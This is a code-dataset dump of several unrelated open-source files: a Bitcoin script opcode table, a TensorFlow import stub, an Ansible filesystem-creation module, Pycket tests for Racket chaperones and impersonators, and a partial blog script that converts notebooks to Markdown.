# vim: set expandtab tabstop=4 shiftwidth=4:
| mit |
kvikshaug/pitcoin | pitcoin/script_opcodes.py | 1 | 1964 | # push value
OP_0 = 0x00
OP_FALSE = OP_0
OP_PUSHDATA1 = 0x4c
OP_PUSHDATA2 = 0x4d
OP_PUSHDATA4 = 0x4e
OP_1NEGATE = 0x4f
OP_RESERVED = 0x50
OP_1 = 0x51
OP_TRUE = OP_1
OP_2 = 0x52
OP_3 = 0x53
OP_4 = 0x54
OP_5 = 0x55
OP_6 = 0x56
OP_7 = 0x57
OP_8 = 0x58
OP_9 = 0x59
OP_10 = 0x5a
OP_11 = 0x5b
OP_12 = 0x5c
OP_13 = 0x5d
OP_14 = 0x5e
OP_15 = 0x5f
OP_16 = 0x60
# control
OP_NOP = 0x61
OP_VER = 0x62
OP_IF = 0x63
OP_NOTIF = 0x64
OP_VERIF = 0x65
OP_VERNOTIF = 0x66
OP_ELSE = 0x67
OP_ENDIF = 0x68
OP_VERIFY = 0x69
OP_RETURN = 0x6a
# stack ops
OP_TOALTSTACK = 0x6b
OP_FROMALTSTACK = 0x6c
OP_2DROP = 0x6d
OP_2DUP = 0x6e
OP_3DUP = 0x6f
OP_2OVER = 0x70
OP_2ROT = 0x71
OP_2SWAP = 0x72
OP_IFDUP = 0x73
OP_DEPTH = 0x74
OP_DROP = 0x75
OP_DUP = 0x76
OP_NIP = 0x77
OP_OVER = 0x78
OP_PICK = 0x79
OP_ROLL = 0x7a
OP_ROT = 0x7b
OP_SWAP = 0x7c
OP_TUCK = 0x7d
# splice ops
OP_CAT = 0x7e
OP_SUBSTR = 0x7f
OP_LEFT = 0x80
OP_RIGHT = 0x81
OP_SIZE = 0x82
# bit logic
OP_INVERT = 0x83
OP_AND = 0x84
OP_OR = 0x85
OP_XOR = 0x86
OP_EQUAL = 0x87
OP_EQUALVERIFY = 0x88
OP_RESERVED1 = 0x89
OP_RESERVED2 = 0x8a
# numeric
OP_1ADD = 0x8b
OP_1SUB = 0x8c
OP_2MUL = 0x8d
OP_2DIV = 0x8e
OP_NEGATE = 0x8f
OP_ABS = 0x90
OP_NOT = 0x91
OP_0NOTEQUAL = 0x92
OP_ADD = 0x93
OP_SUB = 0x94
OP_MUL = 0x95
OP_DIV = 0x96
OP_MOD = 0x97
OP_LSHIFT = 0x98
OP_RSHIFT = 0x99
OP_BOOLAND = 0x9a
OP_BOOLOR = 0x9b
OP_NUMEQUAL = 0x9c
OP_NUMEQUALVERIFY = 0x9d
OP_NUMNOTEQUAL = 0x9e
OP_LESSTHAN = 0x9f
OP_GREATERTHAN = 0xa0
OP_LESSTHANOREQUAL = 0xa1
OP_GREATERTHANOREQUAL = 0xa2
OP_MIN = 0xa3
OP_MAX = 0xa4
OP_WITHIN = 0xa5
# crypto
OP_RIPEMD160 = 0xa6
OP_SHA1 = 0xa7
OP_SHA256 = 0xa8
OP_HASH160 = 0xa9
OP_HASH256 = 0xaa
OP_CODESEPARATOR = 0xab
OP_CHECKSIG = 0xac
OP_CHECKSIGVERIFY = 0xad
OP_CHECKMULTISIG = 0xae
OP_CHECKMULTISIGVERIFY = 0xaf
# expansion
OP_NOP1 = 0xb0
OP_NOP2 = 0xb1
OP_NOP3 = 0xb2
OP_NOP4 = 0xb3
OP_NOP5 = 0xb4
OP_NOP6 = 0xb5
OP_NOP7 = 0xb6
OP_NOP8 = 0xb7
OP_NOP9 = 0xb8
OP_NOP10 = 0xb9
OP_INVALIDOPCODE = 0xff
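# Illustrative helper (not part of the original module): reverse lookup from
# an opcode byte to its OP_* name, e.g. for disassembly/debugging. Aliases
# such as OP_FALSE/OP_0 collapse onto a single name.
OPCODE_NAMES = dict(
    (value, name) for name, value in list(globals().items())
    if name.startswith('OP_') and isinstance(value, int)
)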
| bsd-3-clause |
gojira/tensorflow | tensorflow/contrib/learn/python/learn/preprocessing/__init__.py | 42 | 1263 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Preprocessing tools useful for building models (deprecated).
This module and all its submodules are deprecated. See
[contrib/learn/README.md](https://www.tensorflow.org/code/tensorflow/contrib/learn/README.md)
for migration instructions.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=wildcard-import
from tensorflow.contrib.learn.python.learn.preprocessing.categorical import *
from tensorflow.contrib.learn.python.learn.preprocessing.text import *
# pylint: enable=wildcard-import
| apache-2.0 |
ravello/ansible-modules-extras | system/filesystem.py | 38 | 3422 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2013, Alexander Bulimov <lazywolf0@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
author: Alexander Bulimov
module: filesystem
short_description: Makes file system on block device
description:
- This module creates file system.
version_added: "1.2"
options:
fstype:
description:
- File System type to be created.
required: true
dev:
description:
- Target block device.
required: true
force:
choices: [ "yes", "no" ]
default: "no"
description:
      - If yes, allows creating a new filesystem on a device that already has one.
required: false
opts:
description:
- List of options to be passed to mkfs command.
notes:
- uses mkfs command
'''
EXAMPLES = '''
# Create a ext2 filesystem on /dev/sdb1.
- filesystem: fstype=ext2 dev=/dev/sdb1
# Create a ext4 filesystem on /dev/sdb1 and check disk blocks.
- filesystem: fstype=ext4 dev=/dev/sdb1 opts="-cc"
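# Create an xfs filesystem on /dev/sdc1, replacing any existing filesystem
# (illustrative device name; uses the force option documented above).
- filesystem: fstype=xfs dev=/dev/sdc1 force=yes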
'''
def main():
module = AnsibleModule(
argument_spec = dict(
fstype=dict(required=True, aliases=['type']),
dev=dict(required=True, aliases=['device']),
opts=dict(),
force=dict(type='bool', default='no'),
),
supports_check_mode=True,
)
dev = module.params['dev']
fstype = module.params['fstype']
opts = module.params['opts']
force = module.boolean(module.params['force'])
changed = False
if not os.path.exists(dev):
module.fail_json(msg="Device %s not found."%dev)
cmd = module.get_bin_path('blkid', required=True)
rc,raw_fs,err = module.run_command("%s -c /dev/null -o value -s TYPE %s" % (cmd, dev))
fs = raw_fs.strip()
if fs == fstype:
module.exit_json(changed=False)
elif fs and not force:
module.fail_json(msg="'%s' is already used as %s, use force=yes to overwrite"%(dev,fs), rc=rc, err=err)
### create fs
if module.check_mode:
changed = True
else:
mkfs = module.get_bin_path('mkfs', required=True)
cmd = None
if fstype in ['ext2', 'ext3', 'ext4', 'ext4dev']:
force_flag="-F"
elif fstype in ['xfs', 'btrfs']:
force_flag="-f"
else:
force_flag=""
if opts is None:
cmd = "%s -t %s %s '%s'" % (mkfs, fstype, force_flag, dev)
else:
cmd = "%s -t %s %s %s '%s'" % (mkfs, fstype, force_flag, opts, dev)
rc,_,err = module.run_command(cmd)
if rc == 0:
changed = True
else:
module.fail_json(msg="Creating filesystem %s on device '%s' failed"%(fstype,dev), rc=rc, err=err)
module.exit_json(changed=changed)
# import module snippets
from ansible.module_utils.basic import *
main()
| gpl-3.0 |
pycket/pycket | pycket/test/test_impersonators.py | 4 | 23872 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
from pycket.test.testhelper import *
from pycket.values import *
from pycket.impersonators import *
from pycket.values_struct import *
import pytest
import sys
sys.setrecursionlimit(10000)
def test_impersonator_properties():
m = run_mod(
"""
#lang pycket
(define-values (prop:blue blue? blue-ref) (make-impersonator-property 'blue))
(define-values (prop:green green? green-ref) (make-impersonator-property 'green))
(define-struct point (x y))
(define mystruct (point 1 2))
(define mystruct^ (chaperone-struct mystruct point-x #f prop:blue 7))
(define is-blue (blue? mystruct^))
(define is-green (green? mystruct^))
(define blue-val (blue-ref mystruct^))
""")
is_blue = m.defs[W_Symbol.make("is-blue")]
is_green = m.defs[W_Symbol.make("is-green")]
blue_val = m.defs[W_Symbol.make("blue-val")]
assert is_blue is w_true
assert is_green is w_false
assert isinstance(blue_val, W_Fixnum) and blue_val.value == 7
# This test ensures the new property based on this change to Racket:
# http://git.racket-lang.org/plt/commit/0b71b8481dcf0c8eb99edf5fef9bfdfeb4f92465
def test_chaperone_struct_self_arg():
m = run_mod(
"""
#lang pycket
(struct point (x y))
(define p (point 1 2))
(define cell #f)
(define p-chap
(chaperone-struct p
point-x (lambda (self val) (set! cell self) val)))
(point-x p-chap)
""")
prox = m.defs[W_Symbol.make("p")]
chap = m.defs[W_Symbol.make("p-chap")]
cell = m.defs[W_Symbol.make("cell")]
assert isinstance(prox, W_Struct)
assert isinstance(cell, W_Cell)
assert isinstance(chap, W_ChpStruct)
self = cell.get_val()
#assert self is not prox
assert self is chap
def test_impersonate_struct_self_arg():
m = run_mod(
"""
#lang pycket
(struct point (x y) #:mutable)
(define p (point 1 2))
(define cell #f)
(define p-chap
(impersonate-struct p
point-x (lambda (self val) (set! cell self) val)))
(point-x p-chap)
""")
prox = m.defs[W_Symbol.make("p")]
chap = m.defs[W_Symbol.make("p-chap")]
cell = m.defs[W_Symbol.make("cell")]
assert isinstance(prox, W_Struct)
assert isinstance(cell, W_Cell)
assert isinstance(chap, W_ImpStruct)
self = cell.get_val()
#assert self is not prox
assert self is chap
def test_noninterposing_chaperone():
sym = W_Symbol.make
m = run_mod(
"""
#lang pycket
(define-values (prop:blue blue? blue-ref) (make-impersonator-property 'blue))
(define-values (prop:green green? green-ref) (make-struct-type-property 'green 'can-impersonate))
(define a-equal+hash (list
(lambda (v1 v2 equal?)
(equal? (aa-y v1) (aa-y v2)))
(lambda (v1 hash)
(hash (aa-y v1)))
(lambda (v2 hash)
(hash (aa-y v2)))))
(define (a-impersonator-of v) (a-x v))
(define (aa-y v) (if (a? v) (a-y v) (pre-a-y v)))
(define-struct pre-a (x y)
#:property prop:equal+hash a-equal+hash
#:property prop:green 'color)
(define-struct a (x y)
#:property prop:impersonator-of a-impersonator-of
#:property prop:equal+hash a-equal+hash)
(define-struct (a-more a) (z))
(define-struct (a-new-impersonator a) ()
#:property prop:impersonator-of a-impersonator-of)
(define-struct (a-new-equal a) ()
#:property prop:equal+hash a-equal+hash)
(define a-pre-a (chaperone-struct (make-pre-a 17 1) pre-a-y (lambda (a v) v)))
(define t1 (chaperone-of? a-pre-a a-pre-a))
(define t2
(chaperone-of?
(make-pre-a 17 1)
(chaperone-struct (make-pre-a 17 1) pre-a-y #f prop:blue 'color)))
(define t3
(chaperone-of?
(make-pre-a 17 1)
(chaperone-struct a-pre-a pre-a-y #f prop:blue 'color)))
(define t4
(chaperone-of? a-pre-a
(chaperone-struct a-pre-a pre-a-y #f prop:blue 'color)))
(define t5
(chaperone-of?
(chaperone-struct a-pre-a pre-a-y #f prop:blue 'color)
a-pre-a))
(define t6
(chaperone-of?
a-pre-a
(chaperone-struct a-pre-a pre-a-y (lambda (a v) v) prop:blue 'color)))
(define t7
(chaperone-of? a-pre-a
(chaperone-struct a-pre-a green-ref (lambda (a v) v))))
(define non-interposing (chaperone-struct (make-pre-a 17 1) pre-a-y #f prop:blue 'color))
""")
assert m.defs[sym("t1")] is w_true
assert m.defs[sym("t2")] is w_true
assert m.defs[sym("t3")] is w_false
assert m.defs[sym("t4")] is w_true
assert m.defs[sym("t5")] is w_true
assert m.defs[sym("t6")] is w_false
assert m.defs[sym("t7")] is w_false
a_pre_a = m.defs[sym("a-pre-a")]
assert not a_pre_a.is_non_interposing_chaperone()
interp = m.defs[sym("non-interposing")]
assert interp.is_non_interposing_chaperone()
blue = m.defs[sym("prop:blue")]
assert isinstance(interp, W_InterposeStructBase)
assert interp.get_property(blue) == sym("color")
def test_noninterposing_impersonator():
sym = W_Symbol.make
m = run_mod(
"""
#lang pycket
(define-values (prop:blue blue? blue-ref) (make-impersonator-property 'blue))
(define-values (prop:green green? green-ref) (make-struct-type-property 'green 'can-impersonate))
(define a-equal+hash (list
(lambda (v1 v2 equal?)
(equal? (aa-y v1) (aa-y v2)))
(lambda (v1 hash)
(hash (aa-y v1)))
(lambda (v2 hash)
(hash (aa-y v2)))))
(define (a-impersonator-of v) (a-x v))
(define (aa-y v) (if (a? v) (a-y v) (pre-a-y v)))
(define-struct pre-a (x y)
#:mutable
#:property prop:equal+hash a-equal+hash
#:property prop:green 'color)
(define-struct a (x y)
#:mutable
#:property prop:impersonator-of a-impersonator-of
#:property prop:equal+hash a-equal+hash)
(define-struct (a-more a) (z) #:mutable)
(define-struct (a-new-impersonator a) ()
#:mutable
#:property prop:impersonator-of a-impersonator-of)
(define-struct (a-new-equal a) ()
#:mutable
#:property prop:equal+hash a-equal+hash)
(define a-pre-a (impersonate-struct (make-pre-a 17 1) pre-a-y (lambda (a v) v)))
(define t1 (impersonator-of? a-pre-a a-pre-a))
(define t2
(impersonator-of?
(make-pre-a 17 1)
(impersonate-struct (make-pre-a 17 1) pre-a-y #f prop:blue 'color)))
(define t3
(impersonator-of?
(make-pre-a 17 1)
(impersonate-struct a-pre-a pre-a-y #f prop:blue 'color)))
(define t4
(impersonator-of? a-pre-a
(impersonate-struct a-pre-a pre-a-y #f prop:blue 'color)))
(define t5
(impersonator-of?
(impersonate-struct a-pre-a pre-a-y #f prop:blue 'color)
a-pre-a))
(define t6
(impersonator-of?
a-pre-a
(impersonate-struct a-pre-a pre-a-y (lambda (a v) v) prop:blue 'color)))
(define t7
(impersonator-of? a-pre-a
(impersonate-struct a-pre-a green-ref (lambda (a v) v))))
(define non-interposing (impersonate-struct (make-pre-a 17 1) pre-a-y #f prop:blue 'color))
""")
assert m.defs[sym("t1")] is w_true
assert m.defs[sym("t2")] is w_true
assert m.defs[sym("t3")] is w_false
assert m.defs[sym("t4")] is w_true
assert m.defs[sym("t5")] is w_true
assert m.defs[sym("t6")] is w_false
assert m.defs[sym("t7")] is w_false
a_pre_a = m.defs[sym("a-pre-a")]
assert not a_pre_a.is_non_interposing_chaperone()
interp = m.defs[sym("non-interposing")]
assert interp.is_non_interposing_chaperone()
blue = m.defs[sym("prop:blue")]
assert isinstance(interp, W_InterposeStructBase)
assert interp.get_property(blue) == sym("color")
def test_noninterposing_chaperone_procedure():
m = run_mod(
"""
#lang racket/base
(define-values (prop:blue blue? blue-ref) (make-impersonator-property 'blue))
(define wrapper (lambda (x) x))
(define f1 (lambda (a) a))
(define f2 (lambda (b) b))
(define f3 (lambda (c) c))
(define g1 (chaperone-procedure f1 wrapper))
(define g2 (chaperone-procedure f2 wrapper))
(define g3 (chaperone-procedure f2 wrapper))
(define t1 (chaperone-of? g1 (chaperone-procedure g1 #f prop:blue 'color)))
(define t2 (chaperone-of? g2 (chaperone-procedure g2 #f prop:blue 'color)))
(define t3 (chaperone-of? g3 (chaperone-procedure g3 #f prop:blue 'color)))
(define t4 (chaperone-of? f3 (chaperone-procedure f3 #f prop:blue 'color)))
(define t5 (chaperone-of? f3 (chaperone-procedure g3 #f prop:blue 'color)))
""")
assert m.defs[W_Symbol.make("t1")] is values.w_true
assert m.defs[W_Symbol.make("t2")] is values.w_true
assert m.defs[W_Symbol.make("t3")] is values.w_true
assert m.defs[W_Symbol.make("t4")] is values.w_true
assert m.defs[W_Symbol.make("t5")] is values.w_false
def test_noninterposing_impersonate_procedure():
m = run_mod(
"""
#lang racket/base
(define-values (prop:blue blue? blue-ref) (make-impersonator-property 'blue))
(define wrapper (lambda (x) x))
(define f1 (lambda (a) a))
(define f2 (lambda (b) b))
(define f3 (lambda (c) c))
(define g1 (impersonate-procedure f1 wrapper))
(define g2 (impersonate-procedure f2 wrapper))
(define g3 (impersonate-procedure f2 wrapper))
(define t1 (impersonator-of? g1 (impersonate-procedure g1 #f prop:blue 'color)))
(define t2 (impersonator-of? g2 (impersonate-procedure g2 #f prop:blue 'color)))
(define t3 (impersonator-of? g3 (impersonate-procedure g3 #f prop:blue 'color)))
(define t4 (impersonator-of? f3 (impersonate-procedure f3 #f prop:blue 'color)))
(define t5 (impersonator-of? f3 (impersonate-procedure g3 #f prop:blue 'color)))
""")
assert m.defs[W_Symbol.make("t1")] is values.w_true
assert m.defs[W_Symbol.make("t2")] is values.w_true
assert m.defs[W_Symbol.make("t3")] is values.w_true
assert m.defs[W_Symbol.make("t4")] is values.w_true
assert m.defs[W_Symbol.make("t5")] is values.w_false
def test_chaperone_procedure_star():
m = run_mod(
"""
#lang racket/base
(define val #f)
(define proc (lambda (x) x))
(define g
(chaperone-procedure* proc (lambda (p x) (set! val p) x)))
(g 1)
""")
proc = m.defs[W_Symbol.make("g")]
val = m.defs[W_Symbol.make("val")]
assert isinstance(val, W_Cell)
assert proc is val.get_val()
def test_chaperone_vector_stack_exhaustion():
m = run_mod(
"""
#lang racket/base
(define d
(for/fold ([v (vector 1 2 3)])
([i 1000])
(chaperone-vector v (lambda (x i val) val) (lambda (x i val) val))))
(vector-ref d 0)
""")
def test_impersonate_vector_stack_exhaustion():
m = run_mod(
"""
#lang racket/base
(define d
(for/fold ([v (vector 1 2 3)])
([i 1000])
(impersonate-vector v (lambda (x i val) val) (lambda (x i val) val))))
(vector-ref d 0)
""")
def test_chaperone_vector_to_list():
m = run_mod(
"""
#lang pycket
(define v (vector 1 2 3 4 5))
(define cell 0)
(define imp
(chaperone-vector v
(lambda (self i v) (set! cell (+ cell 1)) v)
(lambda (self i v) v)))
(define chp
(chaperone-vector v
(lambda (self i v) (set! cell (+ cell 1)) v)
(lambda (self i v) v)))
(define base (vector->list v))
(define lst1 (vector->list imp))
(define lst2 (vector->list chp))
(define cmp1 (equal? base lst1))
(define cmp2 (equal? base lst2))
""")
cmp1 = m.defs[W_Symbol.make("cmp1")]
cmp2 = m.defs[W_Symbol.make("cmp2")]
cell = m.defs[W_Symbol.make("cell")]
assert cmp1 is values.w_true
assert cmp2 is values.w_true
assert isinstance(cell, values.W_Cell)
count = cell.get_val()
assert isinstance(count, values.W_Fixnum) and count.value == 10
def test_impersonate_vector_to_list():
m = run_mod(
"""
#lang pycket
(define v (vector 1 2 3 4 5))
(define cell 0)
(define imp
(impersonate-vector v
(lambda (self i v) (set! cell (+ cell 1)) v)
(lambda (self i v) v)))
(define chp
(impersonate-vector v
(lambda (self i v) (set! cell (+ cell 1)) v)
(lambda (self i v) v)))
(define base (vector->list v))
(define lst1 (vector->list imp))
(define lst2 (vector->list chp))
(define cmp1 (equal? base lst1))
(define cmp2 (equal? base lst2))
""")
cmp1 = m.defs[W_Symbol.make("cmp1")]
cmp2 = m.defs[W_Symbol.make("cmp2")]
cell = m.defs[W_Symbol.make("cell")]
assert cmp1 is values.w_true
assert cmp2 is values.w_true
assert isinstance(cell, values.W_Cell)
count = cell.get_val()
assert isinstance(count, values.W_Fixnum) and count.value == 10
def test_impersonate_procedure_application_mark():
m = run_mod(
"""
#lang racket/base
(define saved '())
(define (f x)
(call-with-immediate-continuation-mark
'z
(lambda (val)
(list val
(continuation-mark-set->list (current-continuation-marks) 'z)))))
(define g (impersonate-procedure
f
(lambda (a)
(set! saved (cons (continuation-mark-set-first #f 'z)
saved))
(values (lambda (r) r)
a))
impersonator-prop:application-mark
(cons 'z 12)))
(define h (impersonate-procedure
g
(lambda (a)
(values (lambda (r) r)
a))
impersonator-prop:application-mark
(cons 'z 9)))
(define i (impersonate-procedure
f
(lambda (a)
(set! saved (cons (continuation-mark-set-first #f 'z)
saved))
a)
impersonator-prop:application-mark
(cons 'z 11)))
(define j (impersonate-procedure
i
(lambda (a) a)
impersonator-prop:application-mark
(cons 'z 12)))
(define valid1 (equal? (g 10) '(12 (12))))
(define valid2 (equal? (h 10) '(12 (12 9))))
(define valid3 (equal? (i 10) '(11 (11))))
(define valid4 (equal? (j 10) '(11 (11))))
(define valid5 (equal? saved '(12 #f 9 #f)))
""")
valid1 = m.defs[W_Symbol.make("valid1")]
valid2 = m.defs[W_Symbol.make("valid2")]
valid3 = m.defs[W_Symbol.make("valid3")]
valid4 = m.defs[W_Symbol.make("valid4")]
valid5 = m.defs[W_Symbol.make("valid5")]
assert valid1 is w_true
assert valid2 is w_true
assert valid3 is w_true
assert valid4 is w_true
assert valid5 is w_true
def test_impersonator_of_basic(doctest):
r"""
! (require racket/base)
! (define assert (lambda (v) (unless v (error 'imp-predicates "Assertion violation"))))
! (define (sym a b) (or (chaperone-of? a b) (chaperone-of? b a)))
> (chaperone-of? 10 10)
#t
> (chaperone-of? '(10) '(10))
#t
> (impersonator-of? '(10) '(10))
#t
> (chaperone-of? '#(1 2 3) '#(1 2 3))
#t
> (impersonator-of? '#(1 2 3) '#(1 2 3))
#t
> (chaperone-of? '#&(1 2 3) '#&(1 2 3))
#t
> (impersonator-of? '#&(1 2 3) '#&(1 2 3))
#t
> (chaperone-of? (make-string 1 #\x) (make-string 1 #\x))
#f
> (impersonator-of? (make-string 1 #\x) (make-string 1 #\x))
#t
> (sym (string->immutable-string "x") (make-string 1 #\x))
#f
> (sym '#(1 2 3) (vector 1 2 3))
#f
> (sym '#&17 (box 17))
#f
> (equal? (chaperone-procedure add1 void) (chaperone-procedure add1 void))
#t
> (equal? (impersonate-procedure add1 void) (chaperone-procedure add1 void))
#t
> (equal? (chaperone-procedure add1 void) (impersonate-procedure add1 void))
#t
"""
def test_impersonator_of_structs():
m = run_mod(
"""
#lang pycket
(define assert
(lambda (v)
(unless v
(error 'imp-predicates "Assertion violation"))))
(define (chaperone-of?/impersonator a b)
(assert (impersonator-of? a b))
(chaperone-of? a b))
(define-struct o (a b))
(define-struct p (x y) #:transparent)
(define-struct (p2 p) (z) #:transparent)
(define-struct q (u [w #:mutable]) #:transparent)
(define-struct (q2 q) (v) #:transparent)
(define r1 (chaperone-of? (make-o 1 2) (make-o 1 2)))
(define r2 (impersonator-of? (make-o 1 2) (make-o 1 2)))
(define r3 (chaperone-of?/impersonator (make-p 1 2) (make-p 1 2)))
(define r4 (chaperone-of?/impersonator (make-p 1 (box 2)) (make-p 1 (box 2))))
(define r5 (chaperone-of?/impersonator (make-p2 1 2 3) (make-p2 1 2 3)))
(define r6 (chaperone-of?/impersonator (make-q 1 2) (make-q 1 2)))
(define r7 (chaperone-of?/impersonator (make-q2 1 2 3) (make-q2 1 2 3)))
""")
r1 = m.defs[W_Symbol.make("r1")]
r2 = m.defs[W_Symbol.make("r2")]
r3 = m.defs[W_Symbol.make("r3")]
r4 = m.defs[W_Symbol.make("r4")]
r5 = m.defs[W_Symbol.make("r5")]
r6 = m.defs[W_Symbol.make("r6")]
r7 = m.defs[W_Symbol.make("r7")]
assert r1 is w_false
assert r2 is w_false
assert r3 is w_true
assert r4 is w_false
assert r5 is w_true
assert r6 is w_false
assert r7 is w_false
def test_chaperone_procedure_application_mark():
m = run_mod(
"""
#lang racket/base
(define saved '())
(define (f x)
(call-with-immediate-continuation-mark
'z
(lambda (val)
(list val
(continuation-mark-set->list (current-continuation-marks) 'z)))))
(define g (chaperone-procedure
f
(lambda (a)
(set! saved (cons (continuation-mark-set-first #f 'z)
saved))
(values (lambda (r) r)
a))
impersonator-prop:application-mark
(cons 'z 12)))
(define h (chaperone-procedure
g
(lambda (a)
(values (lambda (r) r)
a))
impersonator-prop:application-mark
(cons 'z 9)))
(define i (chaperone-procedure
f
(lambda (a)
(set! saved (cons (continuation-mark-set-first #f 'z)
saved))
a)
impersonator-prop:application-mark
(cons 'z 11)))
(define j (chaperone-procedure
i
(lambda (a) a)
impersonator-prop:application-mark
(cons 'z 12)))
(define valid1 (equal? (g 10) '(12 (12))))
(define valid2 (equal? (h 10) '(12 (12 9))))
(define valid3 (equal? (i 10) '(11 (11))))
(define valid4 (equal? (j 10) '(11 (11))))
(define valid5 (equal? saved '(12 #f 9 #f)))
""")
valid1 = m.defs[W_Symbol.make("valid1")]
valid2 = m.defs[W_Symbol.make("valid2")]
valid3 = m.defs[W_Symbol.make("valid3")]
valid4 = m.defs[W_Symbol.make("valid4")]
valid5 = m.defs[W_Symbol.make("valid5")]
assert valid1 is w_true
assert valid2 is w_true
assert valid3 is w_true
assert valid4 is w_true
assert valid5 is w_true
def test_application_mark_propagation():
m = run_mod(
u"""
#lang racket/base
(define msgs '())
(define f
(chaperone-procedure
(λ (x) 'wrong)
(λ (x)
(call-with-immediate-continuation-mark
'key
(λ (m)
(set! msgs (cons m msgs))
(values x))))
impersonator-prop:application-mark
(cons 'key 'skip-this-check)))
(void ((chaperone-procedure f (lambda (x) x)) 42)
(f 42))
(define r (equal? msgs '(#f #f)))
""")
r = m.defs[W_Symbol.make("r")]
assert r is w_true
def test_chaperone_vector_to_immutable_vector(doctest):
u"""
! (define v (vector 1 2 3 4 5))
! (define cell '())
! (define v^ (chaperone-vector v (λ (self i val) (set! cell (append cell (list i))) val) (λ (self i val) val)))
> (vector->immutable-vector v^)
#(1 2 3 4 5)
> cell
'(0 1 2 3 4)
"""
def test_rfindler_impersonator_examples(doctest):
ur"""
! (require racket/base)
! (define (add15 x) (+ x 15))
! (define store '())
! (define (clear) (let ([v store]) (begin (set! store '()) v)))
! (define (printf^ fmt . args) (set! store (append store (list (apply format fmt args)))))
! (define add15+print (impersonate-procedure add15 (λ (x) (printf^ "called with ~s" x) (values (λ (res) (printf^ "returned ~s" res) res) x))))
! (define-values (imp-prop:p1 imp-prop:p1? imp-prop:p1-get) (make-impersonator-property 'imp-prop:p1))
! (define-values (imp-prop:p2 imp-prop:p2? imp-prop:p2-get) (make-impersonator-property 'imp-prop:p2))
! (define add15.2 (impersonate-procedure add15 #f imp-prop:p1 11))
! (define add15.3 (impersonate-procedure add15.2 #f imp-prop:p2 13))
! (define add15.4 (impersonate-procedure add15.3 #f imp-prop:p1 101))
> (add15 27)
42
> (add15+print 27)
42
> (clear)
'("called with 27" "returned 42")
> (add15.2 2)
17
> (imp-prop:p1? add15.2)
#t
> (imp-prop:p1-get add15.2)
11
> (imp-prop:p2? add15.2)
#f
> (add15.3 3)
18
> (imp-prop:p1? add15.3)
#t
> (imp-prop:p1-get add15.3)
11
> (imp-prop:p2? add15.3)
#t
> (imp-prop:p2-get add15.3)
13
> (add15.4 4)
19
> (imp-prop:p1? add15.4)
#t
> (imp-prop:p1-get add15.4)
101
> (imp-prop:p2? add15.4)
#t
> (imp-prop:p2-get add15.4)
13
"""
def test_impersonate_procedure_callable_struct():
m = run_mod(
"""
#lang racket/kernel
(#%require racket/private/define
racket/private/small-scheme
racket/private/more-scheme)
(define-values (struct:keyword-procedure mk-kw-proc keyword-procedure?
keyword-procedure-ref keyword-procedure-set!)
(make-struct-type 'keyword-procedure #f 4 0 #f
(list (cons prop:checked-procedure #t))
(current-inspector)
#f
'(0 1 2 3)))
(define-values (struct:okp make-optional-keyword-procedure okp? okp-ref okp-set!)
(make-struct-type 'procedure
struct:keyword-procedure
1 0 #f
(list)
(current-inspector) 0))
(define v5 (make-optional-keyword-procedure #f #f null '(#:x) #f))
(define cv2 (chaperone-procedure v5 void))
(define result (keyword-procedure? cv2))
""")
assert m.defs[W_Symbol.make("result")] is w_true
def test_impersonate_procedure_callable_struct2(doctest):
u"""
! (require racket/private/kw)
! (struct annotated-proc (base note) #:property prop:procedure (struct-field-index base))
! (define example (annotated-proc (λ (x) x) "The identity function"))
! (define imp (impersonate-procedure example add1))
! (define imp2 (chaperone-struct example annotated-proc-note (λ (self x) x)))
> (imp 5)
6
> (annotated-proc-note example)
"The identity function"
> (annotated-proc-note imp)
"The identity function"
> (eq? (annotated-proc-note example) (annotated-proc-note imp))
#t
> (eq? (annotated-proc-note example) (annotated-proc-note imp2))
#t
"""
| mit |
schryer/schryer_pelican_blog | add_links.py | 1 | 6919 | # -*- coding: utf-8 -*-
import os
import glob
import argparse
def make_argument_parser():
'''Return the argument parser for this script.
'''
parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter,
description='''
This script adds links to each markdown file in the blog
========================================================
Each markdown file in stubs/ is converted and written to content/
''')
fg = parser.add_argument_group('Flag parameters')
fg.add_argument('--clean', action='store_true',
dest='clean_generated_files',
default=False,
help='If given, the generated Markdown files are removed; otherwise they are generated.')
return parser
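# Typical invocations (illustrative):
#   python add_links.py           # generate linked Markdown into content/
#   python add_links.py --clean   # remove the previously generated files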
def convert_ipynb_file_to_stub(ipynb_path):
generation_directory = 'stubs/notebooks/generated/'
generated_path = ipynb_path.replace('stubs/notebooks/', generation_directory).replace('.ipynb', '_GENERATED_by_add_links.ipynb')
generated_md_path = generated_path.replace('.ipynb', '.md')
stub_md_path = generated_path.replace('.ipynb', '_stub.md')
final_md_path = stub_md_path.replace(generation_directory, 'content/')
# Copy original files to generated directory
original_meta_path = ipynb_path.replace('.ipynb', '.ipynb-meta')
generated_meta_path = generated_path.replace('.ipynb', '.ipynb-meta')
cmd = 'cp {} {}'.format(original_meta_path, generated_meta_path)
print('Executing: {}'.format(cmd))
os.system(cmd)
cmd = 'cp {} {}'.format(ipynb_path, generated_path)
print('Executing: {}'.format(cmd))
os.system(cmd)
# Convert ipynb files within generated directory
support_path = generated_path.replace('.ipynb', '_files')
support_directory = os.path.split(support_path)[-1]
generated_filename = os.path.split(generated_path)[-1]
cwd = os.getcwd()
print('Changing working directory to: {}'.format(generation_directory))
os.chdir(generation_directory)
cmd = 'ipython nbconvert --to markdown {}'.format(generated_filename)
print('Executing: {}'.format(cmd))
